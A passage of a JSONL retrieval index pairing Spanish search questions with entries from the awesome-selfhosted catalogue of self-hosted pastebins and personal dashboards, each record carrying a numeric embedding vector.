0.04762, -0.07563, -0.06921, -0.02483, -0.0294, -0.01922, -0.04395, -0.05623, 0.08073, 0.09255, 0.18385, -0.11357, 0.15964, 0.07991, 0.05714, -0.061, -0.16537, -0.06045, -0.03863, -0.11303, 0.0884, 0.01965, -0.08958, -0.04465, -0.07817, -0.02787, 0.09967, -0.00326, -0.04899, 0.14505, 0.0352, 0.17343, -0.0019, 0.03219, 0.00118, -0.01177, -0.17413, 0.08386, 0.00614, 0.0072, 0.04712, 0.02875, 0.10736, -0.08063, -0.07083, -0.04938, -0.11882, -0.0921, -0.00723, 0.01126, 0.11999, -0.07688, -0.00736, -0.00533, -0.15363, 0.01908, -0.05636, 0.03091, -0.05775, -0.12468, 0.04659, 0.07244, -0.09828, 0.1727, -0.04384, -0.1345, 0.03193, 0.08167, 0.00085, 0.0215, 0.04813, -0.10555, -0.01831, 0.10606, -0.02706, 0.07929, 0.10905, 0.00369, 0.01217, 0.04207, 0.04537, -0.00709, -0.0159, -0.03108, 0.03013, -0.00976, 0.04672, 0.05317, -0.00088, -0.01386, 0.00949, -0.04471, -0.07163, -0.0182, -0.05781, -0.03817, -0.06351, 0.10057, 0.03643, 0.03538, 0.03005, 0.0658, 0.02119, -0.00243, 0.03256, 0.0753, -0.07916, -0.09725, -0.0118, 0.09083, 0.00302, -0.03241, 0.07653, -0.00797, -0.00313, 0.01635, -0.01949, 0.08238, 0.00109, 0.07643, 0.02025, 0.07245, -0.06388, 0.00056, -0.04629, -0.01955, -0.02128, -0.00481, 0.01681, 0.08786, 0.08703, -0.07217, -0.0557, -0.01753, -0.07167, -0.01871, 0.01656, 0.00635, -0.01521, -0.00861, 0.03371, -0.02748, -0.03755, 0.03094, -0.0454, 0.02347, -0.04979, 0.01264, -0.07418, -0.02214, -0.05202, -0.00174, -0.0883, 0.07168, 0.01482, 0.02867, -0.08511, 0.00224, 0.03304, -0.06066, 0.02821, 0.01839, 0.03828, 0.08513, 0.06927, 0.09561, 0.04735, -0.09775, 0.03212, 0.00433, -0.03496, -0.09131, -0.04694, -0.07467, -0.07666, -0.02356, 0.03213, 0.05314, 0.02057, -0.08931, 0.0525, 0.07022, -0.02751, 0.01206, -0.02392, 0.00426, 0.01232, 0.06713, 0.05026, -0.061, -0.01326, -0.08953, -0.02525, -0.00099, -0.05652, -0.03433, 0.01792, -0.03895, 0.03377, 0.01299, -0.07649, 0.01103, 0.04057, 0.06701, 0.05021, -0.01311, 0.02919, -0.03438, -0.01308, -0.00939, -0.05118, 0.07352, -0.00214, 0.00286, 0.01805, 0.03206, -0.00366, 0.07739, 0.04374, -0.03539, -0.00993, 0.03645, 0.04537, 0.01865, 0.00305, -0.02088, 0.00028, -0.00041, 0.05903, 0.01035, -0.05459, -0.02648, 0.03558, -0.00573, -0.0441, 0.02442, -0.00283, -0.05885, -0.06813, 0.01794, -0.06068, 0.03113, -0.02347, -0.03169, -0.06554, -0.01958, 0.00364, -0.02663, 0.01281, 0.01502]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: lesma β€” Simple paste app friendly with browser and command line [GPL-3.0, Rust/Docker]. Local Content Share β€” Store and share text snippets and files within your local network [MIT, Docker/Go]. not-th.re β€” Simple paste sharing platform, with client side encryption, featuring the monaco browser-based code editor [AGPL-3.0, Nodejs/Docker]. Opengist β€” Pastebin powered by Git [AGPL-3.0, Docker/Go/Nodejs]. paaster β€” End-to-end encrypted pastebin built with the objective of simplicity [AGPL-3.0, Docker]. pacebin β€” Super-minimal pastebin and file upload service focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Password Pusher β€” Dead-simple application to securely communicate passwords (or text) over the web. Passwords automatically expire after a certain number of views and/or time has passed [Apache-2.0, Docker/K8S/Ruby]. Pastefy β€” Beautiful, simple and easy to deploy Pastebin with optional client encryption, multitab pastes, an API, a highlighted editor and more [MIT, Docker/K8S/Java].", "indexar": "que programa puedo usar para compartir fragmentos de texto o archivos en mi red local?", "v": [0.03035, 0.08303, -0.08538, -0.2506, -0.03573, -0.04765, -0.08222, -0.05474, 0.00495, -0.10502, -0.14661, -0.12658, -0.01479, -0.05469, 0.05408, -0.01615, 0.14808, 0.0203, 0.10294, -0.05534, -0.05583, -0.04868, -0.12244, -0.01924, 0.05575, -0.0437, 0.05116, -0.04052, -0.03062, 0.02395, -0.01545, 0.02965, 0.03332, -0.06274, -0.08586, 0.02447, 0.16226, 0.06852, -0.06559, 0.00822, 0.02212, 0.1327, -0.09393, 0.06173, -0.01527, -0.06381, 0.00365, -0.02452, -0.08639, 0.01331, 0.00566, -0.10396, -0.07628, -0.00637, -0.0768, -0.01071, 0.07103, -0.19457, -0.06076, 0.08951, 0.01712, 0.012, -0.07184, -0.04053, -0.00073, -0.04274, 0.02599, 0.0958, -0.1573, 0.17672, -0.01131, 0.09121, 0.03255, 0.00556, -0.03368, 0.10181, -0.08029, -0.15171, 0.07212, -0.02573, 0.0304, 0.04891, 0.09734, 0.05665, 0.00233, -0.07242, 0.06887, -0.06645, 0.01216, -0.00661, -0.03495, -0.11381, 0.07048, -0.00491, 0.01768, -0.09493, 0.06255, 0.01486, -0.03727, 0.03858, 0.07647, -0.05434, 0.00904, 0.04977, 0.06495, 0.0668, -0.04378, 0.07562, 0.07922, -0.03179, 0.08874, -0.04221, -0.05281, 0.07521, -0.08135, 0.01835, 0.03818, 0.02785, 0.03482, -0.06684, -0.02725, 0.05755, -0.09282, -0.0295, 0.09954, -0.00713, -0.0134, 0.13248, -0.14137, 0.09254, -0.00398, 0.0666, -0.02097, -0.14804, -0.06375, -0.03361, 0.08744, -0.00824, -0.02339, -0.03088, -0.01324, -0.01397, -0.06986, 0.04243, 0.00079, 0.10797, -0.0173, -0.07333, 0.04835, -0.01864, -0.02524, -0.04016, -0.04195, -0.04994, -0.04369, 0.02009, 0.1344, -0.02418, -0.09316, -0.01546, -0.05955, 0.0128, -0.06586, 0.00421, 0.04547, -0.09337, 0.0099, 0.03412, 0.07684, 0.02333, 0.01775, 0.09517, -0.01454, -0.04087, 0.00555, 0.02845, -0.0218, -0.04907, -0.02304, 0.00612, -0.01949, 0.02036, 0.00743, 0.09238, 0.0269, -0.02043, 0.01846, 0.03923, -0.05947, -0.0279, -0.02657, -0.05912, 0.0593, 0.03973, -0.01133, -0.00503, -0.00821, 0.00916, 0.03316, -0.03935, -0.08397, 0.00326, -0.04218, 0.04339, 0.04788, 0.03819, -0.0278, -0.00469, 0.05366, 0.08765, 0.00015, 0.02152, 0.05116, 0.00737, -0.04441, -0.00298, 0.02617, 0.05441, 0.06241, 0.00833, 0.08234, 0.02267, 0.04297, 0.04383, 0.03148, -0.05829, -0.02135, -0.05266, 0.01491, 0.0154, -0.01339, -0.01333, -0.02749, 0.01606, -0.00442, -0.05591, -0.0141, 0.01334, -0.00267, -0.06225, -0.03479, 0.08822, -0.00786, -0.05289, -0.03873, 0.02613, -0.10349, 0.00773, 0.00439, 0.00929, -0.00778, -0.02829, 0.03796, -0.06286, 0.04913, 0.07203]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: lesma β€” Simple paste app friendly with browser and command line [GPL-3.0, Rust/Docker]. Local Content Share β€” Store and share text snippets and files within your local network [MIT, Docker/Go]. not-th.re β€” Simple paste sharing platform, with client side encryption, featuring the monaco browser-based code editor [AGPL-3.0, Nodejs/Docker]. Opengist β€” Pastebin powered by Git [AGPL-3.0, Docker/Go/Nodejs]. paaster β€” End-to-end encrypted pastebin built with the objective of simplicity [AGPL-3.0, Docker]. pacebin β€” Super-minimal pastebin and file upload service focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Password Pusher β€” Dead-simple application to securely communicate passwords (or text) over the web. Passwords automatically expire after a certain number of views and/or time has passed [Apache-2.0, Docker/K8S/Ruby]. Pastefy β€” Beautiful, simple and easy to deploy Pastebin with optional client encryption, multitab pastes, an API, a highlighted editor and more [MIT, Docker/K8S/Java].", "indexar": "cual es una alternativa libre y sencilla para tener un servicio de paste bin propio que soporte cifrado extremo a extremo?", "v": [-0.07151, 0.12916, -0.26195, -0.02341, -0.06513, -0.06307, -0.05455, -0.16593, -0.19547, -0.06637, -0.03761, -0.08861, -0.01601, -0.04967, 0.14365, -0.15571, 0.03383, -0.08921, 0.13563, -0.02825, 0.00509, -0.03347, -0.0449, -0.11048, 0.01714, -0.05549, 0.01373, 0.01076, -0.20656, 0.1108, 0.08687, 0.03819, 0.06571, -0.03172, -0.00566, 0.01018, 0.05362, 0.08998, 0.04641, 0.05112, 0.02311, -0.12394, 0.05521, 0.01744, -0.03731, -0.04518, -0.05941, 0.13506, 0.02918, 0.09714, -0.0095, -0.18468, -0.05925, -0.1315, -0.09883, -0.02556, 0.2047, -0.12708, -0.06562, -0.06906, -0.02799, 0.0457, 0.03211, 0.02206, 0.07136, 0.01597, -0.11601, 0.04102, -0.12109, -0.04313, -0.02874, 0.05498, 0.02717, -0.01253, -0.06954, 0.0138, -0.05596, -0.04025, -0.072, 0.06257, 0.01366, -0.05687, -0.00421, -0.00681, -0.0913, -0.04401, 0.02927, -0.06178, 0.02379, 0.02026, 0.11569, 0.03745, -0.0389, 0.05375, -0.06078, -0.02776, -0.00333, 0.01795, 0.00559, 0.04986, 0.07741, 0.00566, -0.12936, 0.0018, 0.01414, -0.00548, -0.00264, -0.04188, -0.08849, 0.01769, -0.0239, 0.04171, 0.00439, -0.02783, 0.00814, -0.12894, -0.01374, -0.01608, 0.0305, -0.06975, 0.00376, -0.02234, 0.06253, -0.0149, 0.01306, -0.01691, 0.00608, 0.01342, 0.02298, -0.0576, -0.00476, -0.01748, 0.0022, -0.05013, -0.03677, 0.01344, 0.05856, -0.03995, 0.01015, 0.03387, 0.03267, 0.07132, -0.11593, -0.11016, 0.02725, -0.09269, 0.07595, -0.02082, -0.00406, 0.0486, -0.06691, 0.02058, -0.04775, 0.10885, -0.12605, 0.00087, -0.03252, -0.06707, -0.01774, 0.06917, 0.06287, -0.05832, -0.01153, -0.01425, -0.05338, 0.01678, 0.00873, -0.0368, 0.00192, -0.02958, -0.09409, 0.04637, -0.00311, -0.0693, 0.06752, -0.08347, -0.03473, -0.09552, 0.02412, -0.03683, 0.03256, 0.00356, -0.05687, -0.02098, 0.05295, -0.03684, 0.00792, 0.01011, -0.00397, 0.02429, 0.00494, 0.03738, -0.09087, -0.07996, -0.00289, -0.0035, -0.02616, -0.0301, 0.03373, -0.04015, -0.0481, 0.00324, -0.01598, -0.01339, -0.02642, -0.01644, -0.11707, 0.01196, -0.02086, 0.08306, 0.03062, 0.00816, 0.04205, 0.00993, -0.04131, -0.00995, 0.02014, -0.01539, 0.01522, 0.00514, 0.05528, -0.02243, 0.0025, 0.03185, 0.0038, 0.08243, 0.06008, 0.03788, -0.02558, 0.03765, 0.01168, -0.05071, 0.00729, 0.01816, 0.04895, 0.00729, 0.01387, 0.00475, -0.0211, 0.0004, 0.03747, 0.08397, -0.038, -0.00331, -0.0179, 0.00802, -0.09175, 0.0223, -0.02007, -0.03843, -0.02132, 0.04812, 0.02376, -0.00504, 0.05082, -0.0327]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: lesma β€” Simple paste app friendly with browser and command line [GPL-3.0, Rust/Docker]. Local Content Share β€” Store and share text snippets and files within your local network [MIT, Docker/Go]. not-th.re β€” Simple paste sharing platform, with client side encryption, featuring the monaco browser-based code editor [AGPL-3.0, Nodejs/Docker]. Opengist β€” Pastebin powered by Git [AGPL-3.0, Docker/Go/Nodejs]. paaster β€” End-to-end encrypted pastebin built with the objective of simplicity [AGPL-3.0, Docker]. pacebin β€” Super-minimal pastebin and file upload service focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Password Pusher β€” Dead-simple application to securely communicate passwords (or text) over the web. Passwords automatically expire after a certain number of views and/or time has passed [Apache-2.0, Docker/K8S/Ruby]. Pastefy β€” Beautiful, simple and easy to deploy Pastebin with optional client encryption, multitab pastes, an API, a highlighted editor and more [MIT, Docker/K8S/Java].", "indexar": "con que herramienta puedo montar un sistema minimalista para subir archivos temporalmente con autenticaciΓ³n?", "v": [0.16108, 0.10114, -0.22889, -0.1362, -0.09865, -0.09328, -0.13085, -0.00177, -0.137, -0.0065, -0.09237, -0.06142, 0.15128, 0.07791, 0.06905, 0.02825, 0.04485, -0.1573, 0.04484, -0.00496, 0.04305, -0.07302, 0.00062, -0.13878, -0.01653, -0.06478, 0.0531, -0.03053, -0.18998, 0.01705, -0.02334, 0.16415, 0.10677, -0.00357, -0.07931, -0.05049, 0.04996, 0.08001, -0.02216, -0.06138, 0.06229, 0.09931, 0.03162, 0.06602, -0.05035, -0.02543, 0.02554, -0.00188, -0.00267, 0.04733, -0.0353, -0.05503, -0.09771, 0.04013, -0.09599, -0.14075, 0.17268, -0.14026, 0.10666, -0.08227, -0.07221, 0.18127, -0.08423, -0.01072, 0.01699, 0.04759, -0.0333, -0.04919, -0.09038, 0.09139, -0.00961, -0.0855, 0.07876, 0.01443, -0.02971, 0.04042, 0.03728, -0.08653, 0.04865, -0.01337, 0.04909, -0.01427, -0.00199, 0.10599, -0.06621, -0.09795, 0.00732, -0.0977, 0.02289, 0.00771, 0.03521, -0.03014, 0.08285, -0.05938, 0.06124, -0.06916, 0.01629, -0.06691, -0.10336, -0.07881, 0.03463, -0.06666, -0.02193, 0.13839, 0.06389, -0.01112, 0.02676, 0.03623, -0.01428, -0.03005, 0.03662, 0.00588, -0.03887, 0.05268, -0.09352, -0.01561, -0.01908, -0.0493, -0.08039, -0.06056, 0.07525, 0.08838, -0.00921, -0.05812, 0.05939, 0.00483, 0.03054, 0.07654, -0.02375, -0.03904, 0.03694, -0.00642, -0.05911, 0.04417, -0.07496, -0.0071, 0.01267, -0.01369, 0.00077, 0.0004, 0.02132, 0.02727, -0.0062, -0.10685, 0.11812, 0.02817, -0.0303, -0.09538, 0.00405, -0.02416, 0.02244, 0.07477, 0.01845, -0.01922, -0.0396, -0.03317, 0.02015, -0.02608, -0.05112, -0.02061, -0.02804, 0.00766, 0.00204, 0.00951, -0.06734, -0.07954, 0.06692, 0.03517, 0.05728, 0.01303, 0.06247, 0.02497, 0.06817, 0.01256, 0.06011, 0.05889, -0.08163, -0.06844, 0.04114, 0.00326, 0.00343, -0.01812, 0.03008, 0.00454, -0.00299, -0.01566, 0.03893, 0.00526, 0.00145, 0.07035, -0.02174, 0.00465, -0.01625, 0.02144, 0.01753, 0.01146, 0.03312, -0.03262, 0.02294, 0.06587, -0.00973, -0.0549, 0.02971, -0.04367, 0.0401, 0.01347, 0.01679, 0.02876, 0.04621, 0.05556, -0.02853, 0.00863, 0.03874, -0.07161, 0.02405, 0.04203, -0.0534, 0.02051, -0.06447, -0.01142, 0.03796, -0.01377, 0.08289, 0.07488, -0.01028, 0.00076, -0.03971, 0.01263, -0.02627, -0.04059, 0.00266, -0.07419, 0.03268, 0.04026, 0.0171, -0.06661, 0.04606, 0.01882, -0.02464, -0.00918, -0.00209, 0.06301, 0.08038, 0.02861, -0.04861, -0.02013, 0.00963, -0.04502, 0.02426, -0.08479, -0.02663, 0.03191, -0.03277, -0.04855, -0.03015, -0.01843]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: PrivateBin β€” Minimalist pastebin/discussion board where the server has zero knowledge of hosted data [Zlib, PHP]. rustypaste β€” Minimal file upload/pastebin service [MIT, Rust]. Snipo β€” Lightweight, self‑hosted snippet manager for saving and organizing code and text snippets with folders, tags, API, and GitHub Gist sync [AGPL-3.0, Go/Docker]. SnyPy β€” Open source on-prem code snippet manager [MIT, Docker]. Sup3rS3cretMes5age β€” Very simple (to deploy and to use) secret message service using Hashicorp Vault as a secrets storage [MIT, Go]. Wastebin β€” Lightweight, minimal and fast pastebin with an SQLite backend [MIT, Rust/Docker]. Yopass β€” Secure sharing of secrets, passwords and files [Apache-2.0, Go/Docker].", "indexar": "que programa es un gestor de snippets ligero y fΓ‘cil de autoalojar?", "v": [0.03647, -0.00539, -0.03207, -0.14048, 0.0424, -0.01861, -0.05613, -0.05205, -0.13646, -0.0865, 0.01996, -0.03219, -0.04511, -0.01846, 0.21803, 0.05535, 0.01058, -0.13946, -0.03711, 0.0894, 0.00034, 0.1452, 0.16017, -0.09126, -0.06638, 0.02456, 0.13865, -0.14946, -0.09072, 0.12919, -0.05291, 0.03854, 0.09999, -0.14709, 0.02356, 0.02723, 0.1035, 0.10449, -0.03796, 0.07168, 0.08367, -0.0227, -0.07084, 0.03075, 0.03736, -0.0582, 0.08833, -0.06255, 0.06628, -0.04611, 0.03162, -0.0119, 0.01049, 0.03361, 0.02881, 0.00666, 0.04512, -0.04968, 0.0215, -0.01168, 7e-05, -0.00549, -0.01128, 0.05543, -0.03326, -0.00421, 0.12207, 0.02253, -0.10455, -0.0153, -0.03271, 0.0574, 0.17198, 0.06419, 0.0398, 0.07033, -0.05777, 0.08598, 0.04324, 0.02613, 0.01384, -0.07038, 0.03135, 0.11498, -0.10949, -0.0095, 0.00343, -0.07981, -0.02006, 0.01797, -0.07297, 0.01244, 0.11568, 0.0748, -0.08437, -0.01284, 0.14766, 0.07658, 0.02351, 0.04174, 0.05602, -0.11547, -0.09095, 0.1484, 0.01144, 0.17855, 0.07232, 0.01484, -0.06195, 0.02358, 0.0137, 0.05568, 0.0288, -0.06474, 0.0025, 0.05033, 0.04947, 0.07757, 0.02001, -0.12105, -0.09395, 0.00833, 0.04339, 0.04018, 0.05815, -0.01167, -0.02053, 0.15027, 0.02126, 0.0713, 0.02543, 0.05359, -0.10556, 0.00599, -0.06936, 0.00532, -0.01221, 0.01957, 0.02991, -0.0294, -0.0071, 0.04588, 0.06628, 0.00407, 0.04328, -0.07864, -0.02768, -0.00752, 0.03628, 0.04949, 0.04462, -0.03385, 0.01419, 0.03191, -0.04116, -0.02713, 0.07548, -0.05404, 0.02514, -0.0126, -0.00735, -0.02844, -0.01687, -0.01483, 0.03947, -0.01233, -0.04366, -0.02306, 0.06055, 0.0616, -0.04003, 0.0921, 0.0371, -0.00895, -0.00887, 0.00239, 0.03795, -0.10335, -0.0142, 0.03176, -0.08876, 0.03266, 0.00902, 0.08289, -0.05442, -0.03123, -0.06864, 0.09192, 0.00317, -0.04693, 0.05009, 0.02793, -0.0394, 0.02118, 0.04639, 0.02119, -0.00031, -0.01087, 0.02321, 0.00354, -0.0833, -0.0346, -0.04205, -0.04183, -0.03917, 0.04212, 0.01352, 0.01912, 0.05375, 0.12831, -0.01411, 0.04891, 0.05351, 0.0535, 0.04433, -0.07651, -0.00382, 0.05767, 0.03934, 0.04386, 0.052, 0.00808, 0.10095, 0.03999, 0.01112, -0.04894, 0.01012, 0.006, 0.00765, 0.05191, -0.08248, -0.05522, 0.01476, -0.00305, 0.06055, 0.00246, 0.00975, -0.06502, -0.0339, -0.04236, 0.05711, 0.07359, 0.05288, -0.0786, -0.03853, -0.00695, 0.00661, -0.00271, 0.026, -0.00262, -0.01352, -0.04115, 0.02272, -0.0706, 0.0362, 0.02796]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: PrivateBin β€” Minimalist pastebin/discussion board where the server has zero knowledge of hosted data [Zlib, PHP]. rustypaste β€” Minimal file upload/pastebin service [MIT, Rust]. Snipo β€” Lightweight, self‑hosted snippet manager for saving and organizing code and text snippets with folders, tags, API, and GitHub Gist sync [AGPL-3.0, Go/Docker]. SnyPy β€” Open source on-prem code snippet manager [MIT, Docker]. Sup3rS3cretMes5age β€” Very simple (to deploy and to use) secret message service using Hashicorp Vault as a secrets storage [MIT, Go]. Wastebin β€” Lightweight, minimal and fast pastebin with an SQLite backend [MIT, Rust/Docker]. Yopass β€” Secure sharing of secrets, passwords and files [Apache-2.0, Go/Docker].", "indexar": "existe alguna alternativa a Pastebin que permita guardar y organizar fragmentos de cΓ³digo?", "v": [-0.04243, 0.10939, -0.18678, -0.10603, -0.10678, -0.15354, 0.09178, -0.00858, -0.25128, -0.14752, -0.03319, -0.11782, 0.02735, 0.06805, 0.1569, -0.03477, 0.15472, -0.01056, 0.0506, -0.00425, -0.06316, 0.07939, -0.02668, 0.06075, -0.03085, -0.1251, 0.00018, -0.06754, -0.18175, 0.03501, 0.0041, 0.01755, 0.06621, -0.03647, -0.13219, 0.05484, 0.16714, 0.04372, -0.05755, -0.00655, -0.06119, 0.09973, -0.05447, 0.16229, -0.09606, -0.0552, -0.11155, 0.16916, 0.04768, 0.07634, -0.04368, 0.00142, -0.01462, 0.01105, 0.04244, -0.10023, 0.03708, -0.0651, -0.06035, -0.00127, -0.00146, -0.015, 0.08091, 0.01261, 0.10248, 0.07659, -0.00606, 0.03557, -0.125, 0.07636, -0.05468, 0.04584, -0.04323, -0.03061, -0.00331, 0.00534, -0.00239, -0.03147, -0.02707, 0.19962, 0.00388, 0.02006, 0.01312, -0.0129, -0.01875, -0.1135, 0.02756, -0.00849, 0.00823, -0.06986, 0.04335, -0.03353, 0.02463, 0.06784, -0.00592, -0.07733, 0.01831, 0.10864, 0.064, 0.05776, 0.05925, -0.02878, -0.00794, 0.03555, 0.07229, 0.09611, 0.04135, 0.05854, 0.10221, -0.00129, -0.0547, -0.02385, -0.1351, -0.02573, -0.04183, -0.12697, 0.04457, -0.01865, -0.00385, -0.0279, -0.04726, 0.04979, -0.06678, 0.07141, 0.03377, 0.04995, 0.08296, 0.13334, -0.04724, -0.05007, -0.05826, -0.01018, -0.03505, -0.0283, -0.05826, -0.00454, 0.05789, -0.01646, 0.05665, 0.04343, -0.03058, 0.01853, -0.02193, 0.04866, -0.01558, 0.04801, 0.00466, 0.01883, -0.0497, 0.00366, 0.01228, 0.00137, -0.07733, 0.0418, -0.02043, 0.06592, -0.03319, -0.08999, -0.03656, -0.00072, -0.05982, 0.04972, -0.05399, -0.02566, -0.01442, -0.04357, 0.04959, 0.03292, -0.0431, 0.03063, 0.03984, 0.03253, 0.09094, -0.07953, 0.01931, -0.02777, -0.04753, -0.05234, 0.03519, 0.00338, 0.02114, 0.05429, 0.01202, 0.01054, 0.01277, -0.06217, 0.01319, 0.0598, -0.0697, -0.04198, 0.09124, 0.00073, 0.01259, -0.01741, -0.04909, -0.00244, 0.01169, -0.0475, 0.06539, 0.03895, -0.02755, 0.02929, 0.00858, -0.04192, -0.01439, -0.00473, -0.08913, 0.0221, -0.01048, 0.0247, 0.07373, -0.03159, 0.02197, -0.02803, -0.06358, 0.02971, 0.00334, 0.06852, 0.00241, -0.04971, -0.00585, -0.0032, -0.0196, -0.01926, 0.05996, -0.02768, -0.05257, 0.05902, 0.05809, 0.03498, -0.00355, 0.01061, 0.03555, 0.08761, 0.02774, -0.02131, -0.0067, -0.05493, 0.01459, -0.01307, 0.02558, 0.01717, -0.01126, -0.00553, -0.04796, 0.01808, -0.04266, 0.02576, -0.02989, -0.01724, 0.03946, -0.03488, 0.00932, -0.03716, 0.03336, -0.00377]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: PrivateBin β€” Minimalist pastebin/discussion board where the server has zero knowledge of hosted data [Zlib, PHP]. rustypaste β€” Minimal file upload/pastebin service [MIT, Rust]. Snipo β€” Lightweight, self‑hosted snippet manager for saving and organizing code and text snippets with folders, tags, API, and GitHub Gist sync [AGPL-3.0, Go/Docker]. SnyPy β€” Open source on-prem code snippet manager [MIT, Docker]. Sup3rS3cretMes5age β€” Very simple (to deploy and to use) secret message service using Hashicorp Vault as a secrets storage [MIT, Go]. Wastebin β€” Lightweight, minimal and fast pastebin with an SQLite backend [MIT, Rust/Docker]. Yopass β€” Secure sharing of secrets, passwords and files [Apache-2.0, Go/Docker].", "indexar": "con quΓ© puedo montar un servicio seguro para compartir contraseΓ±as o mensajes secretos?", "v": [0.16646, 0.10125, -0.15351, -0.13547, -0.12422, -0.15018, -0.13181, -0.10652, -0.01888, -0.12629, -0.03448, 0.05597, 0.08032, -0.0658, 0.05117, 0.06396, 0.19146, 0.08154, 0.08843, 0.08427, 0.13571, -0.06367, -0.09235, -0.09401, -0.04125, -0.04556, 0.08003, -0.01943, -0.05764, 0.0474, 0.03839, -0.0186, 0.0781, 0.0325, -0.04892, 0.10531, 0.05881, 0.13529, 0.07307, 0.02331, 0.06921, -0.01153, -0.04252, 0.04396, -0.0213, -0.03329, -0.03011, 0.01372, 0.08829, -0.04327, -0.01449, -0.11079, -0.09476, -0.08616, -0.09365, -0.0161, 0.18424, -0.00111, 0.03658, -0.01354, -0.06326, 0.03316, 0.01673, 0.11942, -0.02378, -0.14065, 0.04878, 0.01361, -0.14554, 0.0584, -0.00209, -0.02602, -0.02097, 0.10786, 0.00998, 0.06032, -0.06345, 0.00952, -0.07019, 0.15146, -0.03897, 0.02568, 0.00071, 0.03298, -0.06833, -0.02951, -0.03033, -0.0704, 0.00604, -0.07943, 0.11301, 0.02649, -0.02263, 0.09164, -0.0407, -0.01946, 0.00506, 0.03218, -0.07141, 0.017, 0.0132, 0.02383, -0.01374, 0.16474, -0.03587, -0.01861, 0.02184, -0.02521, 0.10608, -0.06725, 0.05385, 0.01932, -0.00392, -0.02473, -0.02164, -0.04906, -0.02698, -0.00481, 0.04752, 0.02112, -0.11667, 0.04609, 0.0941, 0.07579, 0.07685, 0.01684, 0.00758, 0.05243, -0.07015, -0.00709, -0.09032, -0.04066, -0.07104, -0.02961, 0.01462, 0.07251, -0.00881, -0.07886, -0.08008, -0.01536, 0.03174, 0.00337, -0.05315, -0.0541, 0.03703, 0.09557, 0.01158, -0.09484, -0.02442, 0.0255, 0.03784, 0.05798, -0.00675, 0.0094, -0.00974, -0.00543, 0.00574, -0.09625, -0.01023, 0.13025, 0.00262, 0.02259, -0.02386, 0.01265, -0.03555, -0.05191, -0.00293, 0.03731, 0.03605, 0.03312, -0.01811, 0.04147, 0.0468, -0.06535, 0.02737, 0.0159, -0.02198, -0.05293, -0.02023, -0.06844, -0.04401, 0.00376, -0.01514, 0.06408, 0.00284, -0.03285, 0.02789, 0.01865, 0.01, 0.03402, 0.0106, -0.05116, -0.02975, 0.06944, -0.01522, -0.04751, -0.04625, -0.08345, 0.00682, -0.05672, -0.01146, -0.01109, -0.03306, -0.02881, 0.00725, -0.039, -0.06483, 0.00756, 0.0048, 0.0635, 0.07293, -0.06153, 0.06803, -0.0987, -0.08062, 0.00221, 0.00533, -0.01512, -0.05204, 0.02491, 0.03848, 0.02205, 0.03657, -0.03286, 0.02199, 0.0163, -0.00531, 0.05809, 0.06632, 0.05821, -0.00559, 0.07212, -0.07928, 0.04748, 0.11451, 0.0129, -0.03131, -0.02372, -0.02797, -0.0581, -0.02417, 0.06201, 0.04946, -0.05981, -0.02236, -0.04952, -0.07108, 0.06719, -0.0327, -0.03054, -0.02017, -0.00257, -0.01905, -0.03307, 0.00663, -0.11502]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Dashy β€” Feature-rich homepage for your homelab, with easy YAML configuration [MIT, Nodejs/Docker]. Glance β€” Highly customizable dashboard that puts all your feeds in one place [AGPL-3.0, Docker/Go]. gobookmarks β€” Landing page to display bookmarks stored in GitHub, GitLab or local Git [AGPL-3.0, Go/Docker]. Heimdall β€” Elegant solution to organise all your web applications [MIT, PHP]. Homarr β€” Sleek, modern dashboard with many integrations and web-based config [MIT, Docker/Nodejs]. Homepage by gethomepage β€” Highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations [GPL-3.0, Docker/Nodejs]. Homepage by tomershvueli β€” Simple, standalone, self-hosted PHP page that is your window to your server and the web [MIT, PHP]. Homer β€” Dead simple static homepage to expose your server services, with an easy yaml configuration and connectivity check [Apache-2.0, Docker/K8S/Nodejs]. Hubleys β€” Personal dashboards to organize links for multiple users via a central yaml config [MIT, Docker].", "indexar": "quΓ© programa me sirve para hacer un panel de inicio que muestre mis aplicaciones web?", "v": [-0.12766, 0.19121, -0.07095, -0.22692, 0.02339, -0.06699, -0.03914, -0.09961, -0.13969, -0.09113, -0.07045, -0.03512, -0.02164, -0.09396, 0.00723, 0.07067, 0.10628, -0.08077, 0.14596, -0.00199, -0.07015, 0.04428, -0.10109, -0.04352, -0.10073, 0.02302, 0.01501, -0.06414, -0.07189, -0.0534, -0.02449, 0.01505, 0.05859, -0.14239, -0.04965, -0.07301, 0.05812, 0.02119, -0.03191, 0.02018, 